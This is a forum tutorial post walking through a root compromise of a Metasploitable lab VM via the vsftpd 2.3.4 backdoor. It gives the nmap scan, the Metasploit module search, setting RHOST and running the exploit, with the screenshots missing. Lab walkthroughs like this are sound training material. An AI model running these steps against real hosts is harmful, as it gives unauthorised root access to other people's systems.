[Share] Exploit VSFTPD for get Root Acces
#1
Oke .. Today i will show you how to exploit VSFTPD for get root acces using metasploit ...

My Os : Kali Linux 2.0
My Victim : Metasploitable on VMware

Tools :
- Nmap ( Incluede on kali linux )
- Metasploit ( Incluede on kali linux )

Lets rock ....

Scan Your Victim IP using Nmap : nmap -sV 172.16.65.128

My Victim IP : 172.16.65.128
Spoiler! :
[Image: image.png]

i will scan this IP using NMAP :
Spoiler! :
[Image: image.png]

oke ... we got open port on port 21 with VSFTPD service, then we will find the exploit in metasploit
Open your metasploit and type : search vstpd
and use it

Spoiler! :
[Image: image.png]

now show options for prepare our exploit
Spoiler! :
[Image: image.png]

the exploit need to set RHOST and RPORT ( already set as default on port 21 )
next step just set RHOST : msf exploit(vsftpd_234_backdoor) > set RHOST 172.16.65.128

Spoiler! :
[Image: image.png]

Run the exploit and lets see what happen

Spoiler! :
[Image: Screenshot_from_2015_09_16_15_14_54.png]
Spoiler! :
[Image: Screenshot_from_2015_09_16_15_20_38.png]


that's all ... u can do anything like a root Big Grin
Tutorial created by Black-Ink
if u have Questions please coment
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile






Users browsing this thread: 2 Guest(s)